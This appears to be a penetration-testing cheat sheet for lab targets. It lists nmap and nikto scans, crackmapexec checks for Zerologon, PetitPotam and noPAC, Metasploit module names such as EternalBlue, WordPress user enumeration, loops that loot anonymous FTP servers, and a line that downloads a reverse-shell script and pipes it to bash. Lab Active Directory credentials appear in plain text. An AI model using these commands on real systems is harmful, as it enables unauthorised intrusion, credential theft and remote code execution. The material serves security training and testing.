https://pentestsector.com/docs/1.0/services/1443-mssql#credentials

Quick nmap win

Retrieves ports from nmap result file

cat nmap_discovery | grep -o "^[0-9]*" | tr '\n' ','| sed 's/,$//'

Who is there?

nmap -sn 10.11.1.0/24 | grep for | cut -f 5 -d " "

nc.exe -v -z -n -w1 10.185.11.127 1-1024

Which OS out there?

nmap -O -iL target.txt | egrep -i "^running|^os" | head -n -1

Find FTP / web target

sudo nmap -sS -p80,21 10.11.1.0/24 | grep for | cut -f 5 -d " "

Low hanging fruit


nmap -sS -sV -O -T4 -r --script "(default or auth or vuln or exploit or discovery) and not (dns-cache-snoop or broadcast or http-vuln-cve2013-7091 or dns-brute or http-vuln-cve2011-3192 or http-cross-domain-policy or http-slowloris* or http-google-malware or targets-* or *icloud*)" --script-args unsafe=1 -oA 10.10.10.198-NMAP-TCP 10.10.10.198


nmap -T4 -v --script=*vuln* -iL target.txt -oN nmap_vulns.txt
nmap -v --script vuln 10.11.1.0/24 -oN nmap_vulns.txt

nmap -v --script 'rdp-enum-encryption' -p3389 -iL target.txt -oN nmap_rdp_enum.txt

nmap -v -p 139,445 --script=smb-vuln-ms08-067,smb-vuln-ms17-010 10.11.1.5 -oN nmap_rdp.txt
nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 10.11.1.146 -Pn
nmap -sT -sV -Pn -n -v -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse -iL target.txt

nmap --script 'smb-protocols' -p135,139,445 -iL target.txt -Pn -n -v;
nmap --script smb-enum-sessions.nse -p445 -iL target.txt -Pn -n -v;
sudo nmap -sU -sS --script smb-enum-sessions.nse  -Pn -n -p U:137,T:139 -iL target.txt;

nmap -p 139,445 -v --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1


# Scan entire network for FTP servers that allow anonymous access.
nmap -p21 --script=ftp-anon -iL target.txt -oN ftp_anon_10.11.1.0.txt

# Scan entire network for a directory traversal vulnerability. It can even retrieve admin's password hash.
nmap -p 80,8080,443 --script=http-vuln-cve2010-2861 [ip target]/24


nmap -p80,8000,8080,8081,8082,443,21 --open -iL target_10.1.1.0.txt



nmap -p21 -iL target.txt
nmap -p80,8080,443 10.11.1.0/24 --open
nmap -p25,53,110 10.11.1.0/24 --open

nmap -n -v -sV -Pn -p 1433 –script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password $ip

sudo rustscan -t 10000 -a 192.168.2.2 --ulimit 10000 -- -Pn -sC -sV 192.168.2.2

nmap -sU --top-ports 20 -o nmap-udp.out -vvv $RHOST

sudo nmap -sU --top-ports 100 10.11.1.111


for i in $(cat target_10.1.1.0.txt); do for a in $(cat common_ports.txt); do echo "curl -skL http://$i:$a\n\n"; "`curl -skL http://$i:$a`"; echo "\n\n====================================="; done; done

for i in $(cat target.txt); do nikto --ask=no -h $i; echo "\n\n====================================="; done > nikto.txt


for i in $(cat ips); do echo ">>> $i \n\n"; curl -s -L $i; echo "\n\n====================================="; done > ips_10.10.1.x_port80.txt

## AD-set
ldapsearch -x -h 192.168.162.122 -b "dc=hutch,dc=offsec"
/opt/Windows/BloodHound_Python/bloodhound.py -d hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 -c all -ns 192.168.219.122
crackmapexec ldap 192.168.219.122 -u fmcsorley -p CrabSharkJellyfish192 --kdcHost 192.168.219.122 -M laps

Common vulns

exploit/windows/smb/psexec
exploit/multi/http/tomcat_mgr_upload
exploit/windows/smb/ms08_067_netapi
exploit/windows/smb/ms17_010_eternalblue (EternalBlue)
exploit/windows/rdp/cve_2019_0708_bluekeep_rce (BlueKeep)
exploit/windows/smb/smb_doublepulsar_rce (DoublePulsar)
exploit/multi/http/apache_mod_cgi_bash_env_exec (Shellshock)

crackmapexec quick scan

Zerologon

crackmapexec smb <ip> -u '' -p '' -M zerologo

PetitPotam

crackmapexec smb <ip> -u '' -p '' -M petitpotam

noPAC

crackmapexec smb <ip> -u 'user' -p 'pass' -M nopac

CMS

Enumerate wp users


seq 1 5 | xargs -P 50 -I{} echo curl -s -L -i http://wpsite/?author={}

for i in {1..5}; do curl -s -L -i http://wpsite/?author=$i | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z\-\.]*|Location:.*" | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done

Discover with autorecon

sudo $(which autorecon) -o enumeration $ip
sudo autorecon 192.168.150.56 --wpscan.api-token xxxx --only-scans-dir

Discovery tools

nikto -ask=no -h http://10.11.1.116:80 2>&1 | tee -a "nikto.txt"

whatweb --color=auto --aggression 3 10.11.1.133 -v

Scan

Check http service

for i in $(cat ips.txt); do echo ">>> $i \n\n"; curl -s -L $i; echo "\n\n====================================="; done > web_result.txt

List anonymous FTP (Use –no-passive if necessary)

for ip in $(cat ips_ftp); do curl ftp://anonymous:[email protected].$ip; curl ftp://ftp:[email protected].$ip; done

Recursive download the fTP files and store it in folders (using ip for the folder name)

for ip in $(cat ips_ftp); do wget -m ftp://anonymous:[email protected].$ip; done

Download file from ftp

wget -m ftp://anonymous:anonymous@<ip>
wget -m --no-passive ftp://anonymous:anonymous@<ip> #if above fail

Download website (quick crawler)

# Up to 3 level recursively
wget -r -l 3 http://192.168.0.12

wget -r –level=1 -E –ignore-length -x -k -p -erobots=off -np -N http://www.remote.com/remote/presentation/dir

wget -qO- http://10.10.0.3/reverse.sh|bash

# Retrieve all shell files from the server
curl http://10.10.10.10/uploads/ | grep "\[DIR\]" | cut -d "\"" -f 8 > folder-names; while read -r line; do "link: ${line}"; done < folder-names


curl www.nmap.com/ -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
curl http://192.168.120.34/ --silent | grep '<!--' | sed -e 's/^[[:space:]]*//'
curl https://relatedwords.io/dragon-ball-z -s -L | grep -oi 'nofollow">.*</a>' | perl -pe 's/^nofollow">//; s/<\/a>//'

CURL POST

curl -X POST http://10.10.11.120/api -H 'Content-Length: 0'

curl -k -X POST -F 'file=@/home/exploit.jpg' -v http://images.late.htb/scanner

curl -X POST http://10.10.11.120/api/user/register -H 'Content-Type: application/json' -d '{"name":"clobee",password":"clobee"}'

curl -X POST -F "some=thing" -b 'session=abcdef' http://url/api/submit

curl http://192.168.74.101/admin/index.php\?login\=1 -X POST -d 'username[1]=&password[2]='

Prevent path normalisation (in Chrome)

curl --path-as-is --ignore-content-length http://url

Render page

curl 10.11.1.71 -s -L | html2text -width '99' | uniq
curl 10.11.1.71/robots.txt -s | html2text

Render page without the spaces

curl 192.168.136.78 -s | grep "\S"

Diff content side by side

diff -r -y file.1 file.2

Grab banner

whatweb http://scanme.nmap.org/
whatweb -v --color=auto --aggression 3 10.10.10.209

httprint -P0 -h 10.10.32.245 -s /usr/share/httprint/signatures.txt

openssl s_client -connect 10.10.32.245:80

curl -i $IP
curl --head $IP

sudo nc 10.10.32.245 80
GET /index.html

sudo nc 10.10.32.245 80
GET / HTTP/1.1
Host: 10.10.32.245

Parsing json with Jq

# Parsing Bloodhound data 
cat users.json | jq .
cat users.json | jq '.data[].Properties'
cat users.json | jq '.data[].Properties | .samaccountname + ":" + .description' -r